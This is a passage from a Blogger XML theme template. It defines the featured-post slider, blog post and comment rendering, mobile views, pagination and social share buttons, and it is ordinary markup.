2451</b:section>
2452 </div>
2453<div style='clear: both;'/>
2454<b:if cond='data:blog.url == data:blog.homepageUrl'>
2455<div class='featured-slider-wrap row'>
2456 <b:section class='featuresliderpost' id='Featured Post Widget' maxwidget='1' showaddelement='no'>
2457 <b:widget id='HTML111' locked='true' title='Featured' type='HTML' version='1'>
2458 <b:widget-settings>
2459 <b:widget-setting name='content'>Featured</b:widget-setting>
2460 </b:widget-settings>
2461 <b:includable id='main'>
2462 <div class='widget-content'><div class='recent-post-cont'><script src='/feeds/posts/default/-/<data:content/>?orderby=published&alt=json-in-script&callback=labelthumbs'></script></div></div>
2463 </b:includable>
2464 </b:widget>
2465 </b:section>
2466
2467 </div>
2468<div style='clear: both;'/>
2469 </b:if>
2470 <div class='row' id='content-wrapper'>
2471 <div id='main-wrapper'>
2472 <b:section class='main' id='main' showaddelement='yes'>
2473 <b:widget id='Blog1' locked='true' title='Blog Posts' type='Blog' version='1'>
2474 <b:widget-settings>
2475 <b:widget-setting name='showDateHeader'>true</b:widget-setting>
2476 <b:widget-setting name='style.textcolor'>#000000</b:widget-setting>
2477 <b:widget-setting name='showShareButtons'>true</b:widget-setting>
2478 <b:widget-setting name='authorLabel'>By</b:widget-setting>
2479 <b:widget-setting name='showCommentLink'>true</b:widget-setting>
2480 <b:widget-setting name='style.urlcolor'>#008000</b:widget-setting>
2481 <b:widget-setting name='showAuthor'>false</b:widget-setting>
2482 <b:widget-setting name='disableGooglePlusShare'>true</b:widget-setting>
2483 <b:widget-setting name='style.linkcolor'>#0000ff</b:widget-setting>
2484 <b:widget-setting name='style.unittype'>TextAndImage</b:widget-setting>
2485 <b:widget-setting name='style.bgcolor'>#ffffff</b:widget-setting>
2486 <b:widget-setting name='showAuthorProfile'>false</b:widget-setting>
2487 <b:widget-setting name='style.layout'>1x1</b:widget-setting>
2488 <b:widget-setting name='showLabels'>true</b:widget-setting>
2489 <b:widget-setting name='showLocation'>false</b:widget-setting>
2490 <b:widget-setting name='showTimestamp'>true</b:widget-setting>
2491 <b:widget-setting name='postsPerAd'>1</b:widget-setting>
2492 <b:widget-setting name='showBacklinks'>false</b:widget-setting>
2493 <b:widget-setting name='style.bordercolor'>#ffffff</b:widget-setting>
2494 <b:widget-setting name='showInlineAds'>false</b:widget-setting>
2495 <b:widget-setting name='showReactions'>false</b:widget-setting>
2496 </b:widget-settings>
2497 <b:includable id='main' var='top'>
2498 <b:if cond='!data:mobile'>
2499 <!-- posts -->
2500 <div class='blog-posts hfeed'>
2501
2502 <b:include data='top' name='status-message'/>
2503
2504 <b:loop values='data:posts' var='post'>
2505 <b:if cond='data:post.isDateStart and not data:post.isFirstPost'>
2506 </div></div>
2507 </b:if>
2508 <b:if cond='data:post.isDateStart'>
2509 <div class="date-outer">
2510 </b:if>
2511 <b:if cond='data:post.dateHeader'>
2512 <h2 class='date-header'><span><data:post.dateHeader/></span></h2>
2513 </b:if>
2514 <b:if cond='data:post.isDateStart'>
2515 <div class="date-posts">
2516 </b:if>
2517 <div class='post-outer'>
2518 <b:include data='post' name='post'/>
2519 <b:include cond='data:blog.pageType in {"static_page","item"}' data='post' name='comment_picker'/>
2520 </div>
2521
2522 <!-- Ad -->
2523 <b:if cond='data:post.includeAd'>
2524 <div class='inline-ad'>
2525 <data:adCode/>
2526 </div>
2527 </b:if>
2528 </b:loop>
2529 <b:if cond='data:numPosts != 0'>
2530 </div></div>
2531 </b:if>
2532 </div>
2533
2534 <!-- navigation -->
2535 <b:include name='nextprev'/>
2536
2537 <!-- feed links -->
2538 <b:include name='feedLinks'/>
2539
2540 <b:else/>
2541 <b:include name='mobile-main'/>
2542 </b:if>
2543
2544 <b:include cond='data:top.showPlusOne' name='googlePlusBootstrap'/>
2545</b:includable>
2546 <b:includable id='backlinkDeleteIcon' var='backlink'>
2547 <span expr:class='"item-control " + data:backlink.adminClass'>
2548 <a expr:href='data:backlink.deleteUrl' expr:title='data:top.deleteBacklinkMsg'>
2549 <img src='https://resources.blogblog.com/img/icon_delete13.gif'/>
2550 </a>
2551 </span>
2552</b:includable>
2553 <b:includable id='backlinks' var='post'>
2554 <a name='links'/><h4><data:post.backlinksLabel/></h4>
2555 <b:if cond='data:post.numBacklinks != 0'>
2556 <dl class='comments-block' id='comments-block'>
2557 <b:loop values='data:post.backlinks' var='backlink'>
2558 <div class='collapsed-backlink backlink-control'>
2559 <dt class='comment-title'>
2560 <span class='backlink-toggle-zippy'> </span>
2561 <a expr:href='data:backlink.url' rel='nofollow'><data:backlink.title/></a>
2562 <b:include data='backlink' name='backlinkDeleteIcon'/>
2563 </dt>
2564 <dd class='comment-body collapseable'>
2565 <data:backlink.snippet/>
2566 </dd>
2567 <dd class='comment-footer collapseable'>
2568 <span class='comment-author'><data:post.authorLabel/> <data:backlink.author/></span>
2569 <span class='comment-timestamp'><data:post.timestampLabel/> <data:backlink.timestamp/></span>
2570 </dd>
2571 </div>
2572 </b:loop>
2573 </dl>
2574 </b:if>
2575 <p class='comment-footer'>
2576 <a class='comment-link' expr:href='data:post.createLinkUrl' expr:id='data:widget.instanceId + "_backlinks-create-link"' target='_blank'><data:post.createLinkLabel/></a>
2577 </p>
2578</b:includable>
2579 <b:includable id='comment-form' var='post'>
2580 <div class='comment-form'>
2581 <a name='comment-form'/>
2582 <b:if cond='data:mobile'>
2583 <h4 id='comment-post-message'>
2584 <a expr:id='data:widget.instanceId + "_comment-editor-toggle-link"' href='javascript:void(0)'><data:postCommentMsg/></a></h4>
2585 <p><data:blogCommentMessage/></p>
2586 <data:blogTeamBlogMessage/>
2587 <a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>
2588 <iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' style='display: none' width='100%'/>
2589 <b:else/>
2590 <h4 id='comment-post-message'><data:postCommentMsg/></h4>
2591 <p><data:blogCommentMessage/></p>
2592 <data:blogTeamBlogMessage/>
2593 <a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>
2594 <iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/>
2595 </b:if>
2596 <data:post.cmtfpIframe/>
2597 <script type='text/javascript'>
2598 BLOG_CMT_createIframe('<data:post.appRpcRelayPath/>');
2599 </script>
2600 </div>
2601</b:includable>
2602 <b:includable id='commentDeleteIcon' var='comment'>
2603 <span expr:class='"item-control " + data:comment.adminClass'>
2604 <b:if cond='data:showCmtPopup'>
2605 <div class='goog-toggle-button'>
2606 <div class='goog-inline-block comment-action-icon'/>
2607 </div>
2608 <b:else/>
2609 <a class='comment-delete' expr:href='data:comment.deleteUrl' expr:title='data:top.deleteCommentMsg'>
2610 <img src='https://resources.blogblog.com/img/icon_delete13.gif'/>
2611 </a>
2612 </b:if>
2613 </span>
2614</b:includable>
2615 <b:includable id='comment_count_picker' var='post'>
2616 <b:if cond='data:post.commentSource == 1'>
2617 <span class='cmt_count_iframe_holder' expr:data-count='data:post.numComments' expr:data-onclick='data:post.addCommentOnclick' expr:data-post-url='data:post.url' expr:data-url='data:post.url.canonical.http'>
2618 </span>
2619 <b:else/>
2620 <a class='comment-link' expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'>
2621 <data:post.commentLabelFull/>:
2622 </a>
2623 </b:if>
2624</b:includable>
2625 <b:includable id='comment_picker' var='post'>
2626 <b:if cond='data:post.commentSource == 1'>
2627 <b:include data='post' name='iframe_comments'/>
2628 <b:elseif cond='data:post.showThreadedComments'/>
2629 <b:include data='post' name='threaded_comments'/>
2630 <b:else/>
2631 <b:include data='post' name='comments'/>
2632 </b:if>
2633</b:includable>
2634 <b:includable id='comments' var='post'>
2635 <div class='comments' id='comments'>
2636 <a name='comments'/>
2637 <b:if cond='data:post.allowComments'>
2638 <h4><data:post.commentLabelFull/>:</h4>
2639
2640 <b:if cond='data:post.commentPagingRequired'>
2641 <span class='paging-control-container'>
2642 <b:if cond='data:post.hasOlderLinks'>
2643 <a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'><data:post.oldestLinkText/></a>
2644  
2645 <a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'><data:post.olderLinkText/></a>
2646  
2647 </b:if>
2648
2649 <data:post.commentRangeText/>
2650
2651 <b:if cond='data:post.hasNewerLinks'>
2652  
2653 <a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'><data:post.newerLinkText/></a>
2654  
2655 <a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'><data:post.newestLinkText/></a>
2656 </b:if>
2657 </span>
2658 </b:if>
2659
2660 <div expr:id='data:widget.instanceId + "_comments-block-wrapper"'>
2661 <dl expr:class='data:post.avatarIndentClass' id='comments-block'>
2662 <b:loop values='data:post.comments' var='comment'>
2663 <dt expr:class='"comment-author " + data:comment.authorClass' expr:id='data:comment.anchorName'>
2664 <b:if cond='data:comment.favicon'>
2665 <img expr:src='data:comment.favicon' height='16px' style='margin-bottom:-2px;' width='16px'/>
2666 </b:if>
2667 <a expr:name='data:comment.anchorName'/>
2668 <b:if cond='data:blog.enabledCommentProfileImages'>
2669 <data:comment.authorAvatarImage/>
2670 </b:if>
2671 <b:if cond='data:comment.authorUrl'>
2672 <a expr:href='data:comment.authorUrl' rel='nofollow'><data:comment.author/></a>
2673 <b:else/>
2674 <data:comment.author/>
2675 </b:if>
2676 <data:commentPostedByMsg/>
2677 </dt>
2678 <dd class='comment-body' expr:id='data:widget.instanceId + data:comment.cmtBodyIdPostfix'>
2679 <b:if cond='data:comment.isDeleted'>
2680 <span class='deleted-comment'><data:comment.body/></span>
2681 <b:else/>
2682 <p>
2683 <data:comment.body/>
2684 </p>
2685 </b:if>
2686 </dd>
2687 <dd class='comment-footer'>
2688 <span class='comment-timestamp'>
2689 <a expr:href='data:comment.url' title='comment permalink'>
2690 <data:comment.timestamp/>
2691 </a>
2692 <b:include data='comment' name='commentDeleteIcon'/>
2693 </span>
2694 </dd>
2695 </b:loop>
2696 </dl>
2697 </div>
2698
2699 <b:if cond='data:post.commentPagingRequired'>
2700 <span class='paging-control-container'>
2701 <a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'>
2702 <data:post.oldestLinkText/>
2703 </a>
2704 <a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'>
2705 <data:post.olderLinkText/>
2706 </a>
2707  
2708 <data:post.commentRangeText/>
2709  
2710 <a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'>
2711 <data:post.newerLinkText/>
2712 </a>
2713 <a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'>
2714 <data:post.newestLinkText/>
2715 </a>
2716 </span>
2717 </b:if>
2718
2719 <p class='comment-footer'>
2720 <b:if cond='data:post.embedCommentForm'>
2721 <b:if cond='data:post.allowNewComments'>
2722 <b:include data='post' name='comment-form'/>
2723 <b:else/>
2724 <data:post.noNewCommentsText/>
2725 </b:if>
2726 <b:elseif cond='data:post.allowComments'/>
2727 <a expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'><data:postCommentMsg/></a>
2728 </b:if>
2729 </p>
2730 </b:if>
2731 <b:if cond='data:showCmtPopup'>
2732 <div id='comment-popup'>
2733 <iframe allowtransparency='true' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'>
2734 </iframe>
2735 </div>
2736 </b:if>
2737
2738 <div id='backlinks-container'>
2739 <div expr:id='data:widget.instanceId + "_backlinks-container"'>
2740 <b:include cond='data:post.showBacklinks' data='post' name='backlinks'/>
2741 </div>
2742 </div>
2743 </div>
2744</b:includable>
2745 <b:includable id='feedLinks'>
2746 <b:if cond='data:blog.pageType != "item"'> <!-- Blog feed links -->
2747 <b:if cond='data:feedLinks'>
2748 <div class='blog-feeds'>
2749 </div>
2750 </b:if>
2751
2752 <b:else/> <!--Post feed links -->
2753 <div class='post-feeds'>
2754 <b:loop values='data:posts' var='post'>
2755 <b:include cond='data:post.allowComments and data:post.feedLinks' data='post.feedLinks' name='feedLinksBody'/>
2756 </b:loop>
2757 </div>
2758 </b:if>
2759</b:includable>
2760 <b:includable id='feedLinksBody' var='links'>
2761 <div class='feed-links'>
2762 <data:feedLinksMsg/>
2763 <b:loop values='data:links' var='f'>
2764 <a class='feed-link' expr:href='data:f.url' expr:type='data:f.mimeType' target='_blank'><data:f.name/> (<data:f.feedType/>)</a>
2765 </b:loop>
2766 </div>
2767</b:includable>
2768 <b:includable id='iframe_comments' var='post'>
2769
2770 <b:if cond='data:post.allowIframeComments'>
2771 <script expr:src='data:post.iframeCommentSrc' type='text/javascript'/>
2772 <div class='cmt_iframe_holder' expr:data-href='data:post.url.canonical' expr:data-viewtype='data:post.viewType'/>
2773
2774 <b:if cond='data:post.embedCommentForm == "false"'>
2775 <a expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'><data:postCommentMsg/></a>
2776 </b:if>
2777 </b:if>
2778</b:includable>
2779 <b:includable id='mobile-index-post' var='post'>
2780 <div class='mobile-date-outer date-outer'>
2781 <b:if cond='data:post.dateHeader'>
2782 <div class='date-header'>
2783 <span><data:post.dateHeader/></span>
2784 </div>
2785 </b:if>
2786
2787 <div class='mobile-post-outer'>
2788 <a expr:href='data:post.url'>
2789 <h3 class='mobile-index-title entry-title' itemprop='name'>
2790 <data:post.title/>
2791 </h3>
2792
2793 <div class='mobile-index-arrow'>&rsaquo;</div>
2794
2795 <div class='mobile-index-contents'>
2796 <b:if cond='data:post.thumbnailUrl'>
2797 <div class='mobile-index-thumbnail'>
2798 <div class='Image'>
2799 <img expr:src='data:post.thumbnailUrl'/>
2800 </div>
2801 </div>
2802 </b:if>
2803
2804 <div class='post-body'>
2805 <b:if cond='data:post.snippet'><data:post.snippet/></b:if>
2806 </div>
2807 </div>
2808
2809 <div style='clear: both;'/>
2810 </a>
2811
2812 <div class='mobile-index-comment'>
2813 <b:include cond='data:blog.pageType != "static_page" and data:post.allowComments and data:post.numComments != 0' data='post' name='comment_count_picker'/>
2814 </div>
2815 </div>
2816 </div>
2817</b:includable>
2818 <b:includable id='mobile-main' var='top'>
2819 <!-- posts -->
2820 <div class='blog-posts hfeed'>
2821
2822 <b:include data='top' name='status-message'/>
2823
2824 <b:if cond='data:blog.pageType == "index"'>
2825 <b:loop values='data:posts' var='post'>
2826 <b:include data='post' name='mobile-index-post'/>
2827 </b:loop>
2828 <b:else/>
2829 <b:loop values='data:posts' var='post'>
2830 <b:include data='post' name='mobile-post'/>
2831 </b:loop>
2832 </b:if>
2833 </div>
2834
2835 <b:include name='mobile-nextprev'/>
2836</b:includable>
2837 <b:includable id='mobile-nextprev'>
2838 <div class='blog-pager' id='blog-pager'>
2839 <b:if cond='data:newerPageUrl'>
2840 <div class='mobile-link-button' id='blog-pager-newer-link'>
2841 <a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + "_blog-pager-newer-link"' expr:title='data:newerPageTitle'>&lsaquo;</a>
2842 </div>
2843 </b:if>
2844
2845 <b:if cond='data:olderPageUrl'>
2846 <div class='mobile-link-button' id='blog-pager-older-link'>
2847 <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + "_blog-pager-older-link"' expr:title='data:olderPageTitle'>&rsaquo;</a>
2848 </div>
2849 </b:if>
2850
2851 <div class='mobile-link-button' id='blog-pager-home-link'>
2852 <a class='home-link' expr:href='data:blog.homepageUrl'><data:homeMsg/></a>
2853 </div>
2854
2855 <div class='mobile-desktop-link'>
2856 <a class='home-link' expr:href='data:desktopLinkUrl'><data:desktopLinkMsg/></a>
2857 </div>
2858
2859 </div>
2860 <div class='clear'/>
2861</b:includable>
2862 <b:includable id='mobile-post' var='post'>
2863 <div class='date-outer'>
2864 <b:if cond='data:post.dateHeader'>
2865 <h2 class='date-header'><span><data:post.dateHeader/></span></h2>
2866 </b:if>
2867 <div class='date-posts'>
2868 <div class='post-outer'>
2869
2870 <div class='post hentry uncustomized-post-template' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'>
2871 <b:if cond='data:post.thumbnailUrl'>
2872 <meta expr:content='data:post.thumbnailUrl' itemprop='image_url'/>
2873 </b:if>
2874 <meta expr:content='data:blog.blogId' itemprop='blogId'/>
2875 <meta expr:content='data:post.id' itemprop='postId'/>
2876
2877 <a expr:name='data:post.id'/>
2878 <b:if cond='data:post.title'>
2879 <b:if cond='data:blog.pageType == "index"'>
2880 <h2 class='post-title entry-title' itemprop='name'>
2881 <b:if cond='data:post.link'>
2882 <a expr:href='data:post.link' itemprop='url'><data:post.title/></a>
2883 <b:else/>
2884 <b:if cond='data:post.url'>
2885<a expr:href='data:post.url' itemprop='url'><data:post.title/></a>
2886<b:else/>
2887 <data:post.title/>
2888 </b:if>
2889 </b:if>
2890 </h2>
2891 <b:elseif cond='data:blog.pageType == "archive"'/>
2892<h2 class='post-title entry-title' itemprop='name'>
2893 <b:if cond='data:post.link'>
2894 <a expr:href='data:post.link' itemprop='url'><data:post.title/></a>
2895 <b:else/>
2896 <b:if cond='data:post.url'>
2897<a expr:href='data:post.url' itemprop='url'><data:post.title/></a>
2898<b:else/>
2899 <data:post.title/>
2900 </b:if>
2901 </b:if>
2902 </h2>
2903<b:else/>
2904<h1 class='post-title entry-title' itemprop='name'>
2905 <b:if cond='data:post.link'>
2906 <data:post.title/>
2907 <b:else/>
2908 <b:if cond='data:post.url'>
2909 <data:post.title/>
2910<b:else/>
2911 <data:post.title/>
2912 </b:if>
2913 </b:if>
2914 </h1>
2915</b:if>
2916 </b:if>
2917
2918 <div class='post-header'>
2919 <div class='post-header-line-1'/>
2920 </div>
2921
2922 <div class='post-body entry-content' expr:id='"post-body-" + data:post.id' itemprop='articleBody'>
2923 <data:post.body/>
2924 <div style='clear: both;'/> <!-- clear for photos floats -->
2925 </div>
2926
2927 <div class='post-footer'>
2928 <div class='post-footer-line post-footer-line-1'>
2929 <span class='post-author vcard'>
2930 <b:if cond='data:top.showAuthor'>
2931 <b:if cond='data:post.authorProfileUrl'>
2932 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
2933 <meta expr:content='data:post.authorProfileUrl' itemprop='url'/>
2934 <a expr:href='data:post.authorProfileUrl' rel='author' title='author profile'>
2935 <span itemprop='name'><data:post.author/></span>
2936 </a>
2937 </span>
2938 <b:else/>
2939 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
2940 <span itemprop='name'><data:post.author/></span>
2941 </span>
2942 </b:if>
2943 </b:if>
2944 </span>
2945
2946 <span class='post-timestamp'>
2947 <b:if cond='data:top.showTimestamp'>
2948 <data:top.timestampLabel/>
2949 <b:if cond='data:post.url'>
2950 <meta expr:content='data:post.canonicalUrl' itemprop='url'/>
2951 <a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'><abbr class='published' expr:title='data:post.timestampISO8601' itemprop='datePublished'><data:post.timestamp/></abbr></a>
2952 </b:if>
2953 </b:if>
2954 </span>
2955
2956 <span class='post-comment-link'>
2957 <b:include cond='data:blog.pageType not in {"item","static_page"} and data:post.allowComments' data='post' name='comment_count_picker'/>
2958 </span>
2959 </div>
2960
2961 <div class='post-footer-line post-footer-line-2'>
2962 <b:if cond='data:top.showMobileShare'>
2963 <div class='mobile-link-button goog-inline-block' id='mobile-share-button'>
2964 <a href='javascript:void(0);'><data:shareMsg/></a>
2965 </div>
2966 </b:if>
2967 <b:if cond='data:top.showDummy'>
2968 <div class='goog-inline-block dummy-container'><data:post.dummyTag/></div>
2969 </b:if>
2970 </div>
2971
2972 </div>
2973 </div>
2974
2975 <b:include cond='data:blog.pageType in {"static_page","item"}' data='post' name='comment_picker'/>
2976 </div>
2977 </div>
2978 </div>
2979</b:includable>
2980 <b:includable id='nextprev'>
2981 <div class='blog-pager' id='blog-pager'>
2982 <b:if cond='data:newerPageUrl'>
2983 <span id='blog-pager-newer-link'>
2984 <a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + "_blog-pager-newer-link"' expr:title='data:newerPageTitle'><data:newerPageTitle/></a>
2985 </span>
2986 </b:if>
2987
2988 <b:if cond='data:olderPageUrl'>
2989 <span id='blog-pager-older-link'>
2990 <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + "_blog-pager-older-link"' expr:title='data:olderPageTitle'><data:olderPageTitle/></a>
2991 </span>
2992 </b:if>
2993
2994 <a class='home-link' expr:href='data:blog.homepageUrl'><data:homeMsg/></a>
2995
2996 <b:if cond='data:mobileLinkUrl'>
2997 <div class='blog-mobile-link'>
2998 <a expr:href='data:mobileLinkUrl'><data:mobileLinkMsg/></a>
2999 </div>
3000 </b:if>
3001
3002 </div>
3003 <div class='clear'/>
3004</b:includable>
3005 <b:includable id='post' var='post'>
3006 <div class='post hentry'>
3007<b:if cond='data:blog.pageType != "item"'>
3008 <b:if cond='data:blog.pageType != "static_page"'>
3009<div class='index-post-head'>
3010<div class='meta-top'>
3011<div class='tag'>
3012 <b:if cond='data:post.labels'>
3013 <span class='tag-icon'><i class='fa fa-folder-open-o'/></span>
3014 <b:loop values='data:post.labels' var='label'>
3015 <b:if cond='data:label.isLast == "true"'>
3016 <span class='tag-name'><a expr:href='data:label.url' rel='tag'><data:label.name/></a></span>
3017 </b:if>
3018 </b:loop>
3019 </b:if>
3020 </div>
3021<div id='meta-post'>
3022 <i class='fa fa-user'/> <a class='g-profile' expr:href='data:post.authorProfileUrl' expr:title='data:post.author' rel='author'>
3023 <span itemprop='name'><data:post.author/></span></a> <i class='fa fa-calendar-o'/>
3024<abbr class='published timeago' expr:title='data:post.timestampISO8601'><data:post.timestamp/></abbr></div>
3025 </div>
3026<div style='clear: both;'/>
3027 <b:if cond='data:post.title'>
3028 <font class='retitle'>
3029 <h2 class='post-title entry-title'>
3030 <b:if cond='data:post.link'>
3031 <a expr:href='data:post.link'>
3032 <data:post.title/>
3033 </a>
3034 <b:else/>
3035 <b:if cond='data:post.url'>
3036 <a expr:href='data:post.url'>
3037 <data:post.title/>
3038 </a>
3039 <b:else/>
3040 <data:post.title/>
3041 </b:if>
3042 </b:if>
3043 </h2>
3044 </font>
3045 </b:if>
3046<div style='clear: both;'/>
3047</div>
3048 </b:if>
3049 </b:if>
3050 <b:if cond='data:blog.pageType == "index"'>
3051 <b:if cond='data:post.thumbnailUrl'>
3052 <div class='block-image'><div class='thumb'>
3053 <a href='<data:post.url/>' style='background:url(<data:post.thumbnailUrl/>) no-repeat center center;background-size:cover'></a>
3054 </div></div>
3055 <b:else/>
3056 <b:if cond='data:post.firstImageUrl'>
3057 <div class='block-image'><div class='thumb'>
3058 <a href='<data:post.url/>' style='background:url(<data:post.firstImageUrl/>) no-repeat center center;background-size:cover'></a>
3059 </div></div>
3060 <b:else/>
3061 <div class='block-image'><div class='thumb'>
3062 <a href='<data:post.url/>' style='background:url(http://2.bp.blogspot.com/-IO-XEI1LgEs/VmPNKFp0BhI/AAAAAAAACOg/_JrYHMBXV5w/s1600-r/nothumb.jpg) no-repeat center center;background-size:cover'></a>
3063 </div></div>
3064 </b:if></b:if>
3065 </b:if>
3066 <b:if cond='data:blog.pageType == "archive"'>
3067 <b:if cond='data:post.thumbnailUrl'>
3068 <div class='block-image'><div class='thumb'>
3069 <a href='<data:post.url/>' style='background:url(<data:post.thumbnailUrl/>) no-repeat center center;background-size:cover'></a>
3070 </div></div>
3071 <b:else/>
3072 <b:if cond='data:post.firstImageUrl'>
3073 <div class='block-image'><div class='thumb'>
3074 <a href='<data:post.url/>' style='background:url(<data:post.firstImageUrl/>) no-repeat center center;background-size:cover'></a>
3075 </div></div>
3076 <b:else/>
3077 <div class='block-image'><div class='thumb'>
3078 <a href='<data:post.url/>' style='background:url(http://2.bp.blogspot.com/-IO-XEI1LgEs/VmPNKFp0BhI/AAAAAAAACOg/_JrYHMBXV5w/s1600-r/nothumb.jpg) no-repeat center center;background-size:cover'></a>
3079 </div></div>
3080 </b:if></b:if>
3081 </b:if>
3082 <b:if cond='data:blog.pageType == "item"'>
3083 <div itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'>
3084 <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject' style='display:none;'>
3085 <meta expr:content='data:post.firstImageUrl' itemprop='url'/>
3086 <meta content='700' itemprop='width height'/>
3087 </div>
3088 </b:if>
3089<div id='new-badge' style='display:none;'>New</div>
3090 <div class='post-header'>
3091 <b:if cond='data:blog.pageType == "item"'>
3092 <b:if cond='data:post.title'>
3093 <div class='post-head'><h1 class='post-title entry-title' itemprop='name headline'>
3094 <b:if cond='data:post.link'>
3095 <a expr:href='data:post.link'><data:post.title/></a>
3096 <b:else/>
3097 <b:if cond='data:post.url'>
3098 <b:if cond='data:blog.url != data:post.url'>
3099 <a expr:href='data:post.url'><data:post.title/></a>
3100 <b:else/>
3101 <data:post.title/>
3102 </b:if>
3103 <b:else/>
3104 <data:post.title/>
3105 </b:if>
3106 </b:if>
3107 </h1></div>
3108 </b:if>
3109 <div class='post-meta'>
3110<span class='post-author vcard'>
3111 <b:if cond='data:top.showAuthor'>
3112 <i class='fa fa-user'/>
3113 <b:if cond='data:post.authorProfileUrl'>
3114 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3115 <meta expr:content='data:post.authorProfileUrl' itemprop='url'/>
3116 <a class='g-profile' expr:href='data:post.authorProfileUrl' expr:title='data:post.author' rel='author'>
3117 <span itemprop='name'><data:post.author/></span>
3118 </a>
3119 </span>
3120 <b:else/>
3121 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3122 <a class='g-profile' expr:href='data:post.authorProfileUrl' expr:title='data:post.author' rel='author'>
3123 <span itemprop='name'><data:post.author/></span></a>
3124 </span>
3125 </b:if>
3126 </b:if>
3127 </span>
3128 <span class='post-timestamp'>
3129 <b:if cond='data:top.showTimestamp'>
3130 <i class='fa fa-calendar-o'/>
3131 <b:if cond='data:post.url'>
3132 <meta expr:content='data:post.canonicalUrl' itemprop='url mainEntityOfPage'/>
3133 <a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'><abbr class='published timeago' expr:title='data:post.timestampISO8601' itemprop='datePublished dateModified'><data:post.timestamp/></abbr></a>
3134 </b:if>
3135 </b:if>
3136 </span>
3137<span class='label-head'>
3138 <b:if cond='data:post.labels'>
3139 <i class='fa fa-folder-open-o'/>
3140 <b:loop values='data:post.labels' var='label'>
3141 <a expr:href='data:label.url' rel='tag'><data:label.name/></a><b:if cond='data:label.isLast != "true"'>,</b:if>
3142 </b:loop>
3143 </b:if>
3144 </span>
3145 </div>
3146 </b:if>
3147 <b:if cond='data:blog.pageType == "static_page"'>
3148 <b:if cond='data:post.title'>
3149 <div class='post-head'><h1 class='post-title entry-title' itemprop='name'>
3150 <b:if cond='data:post.link'>
3151 <a expr:href='data:post.link'><data:post.title/></a>
3152 <b:else/>
3153 <b:if cond='data:post.url'>
3154 <b:if cond='data:blog.url != data:post.url'>
3155 <a expr:href='data:post.url'><data:post.title/></a>
3156 <b:else/>
3157 <data:post.title/>
3158 </b:if>
3159 <b:else/>
3160 <data:post.title/>
3161 </b:if>
3162 </b:if>
3163 </h1></div>
3164 </b:if>
3165 </b:if>
3166
3167 </div>
3168
3169 <!-- Then use the post body as the schema.org description, for good G+/FB snippeting. -->
3170 <article>
3171 <b:if cond='data:blog.pageType != "item"'>
3172 <b:if cond='data:blog.pageType != "static_page"'>
3173<div class='meta-botom'>
3174<span class='post-cmm'>
3175 <b:if cond='data:post.allowComments'>
3176 <i class='fa fa-comments-o'/> <a expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'><data:post.numComments/></a>
3177 </b:if>
3178 </span>
3179 <div class='share-art'>
3180<a class='fac-art' expr:href='"http://www.facebook.com/sharer.php?u=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook'/><span class='resp_del'> Facebook</span></a>
3181
3182<a class='twi-art' expr:href='"http://twitter.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter'/><span class='resp_del2'> Twitter</span></a>
3183
3184<a class='goo-art' expr:href='"https://plus.google.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus'/><span class='resp_del3'> Google+</span></a>
3185
3186<a class='pin-art' expr:href='"http://pinterest.com/pin/create/button/?url=" + data:post.url + "&media=" + data:post.firstImageUrl + "&description=" + data:post.snippet' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-pinterest'/><span class='resp_del4'> Pinterest</span></a>
3187
3188<a class='lin-art' expr:href='"http://www.linkedin.com/shareArticle?url=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-linkedin-square'/><span class='resp_del5'> Linkedin</span></a>
3189
3190</div>
3191 </div>
3192<div style='clear: both;'/>
3193 <div class='date-header'>
3194 <div class='resumo'>
3195<span>
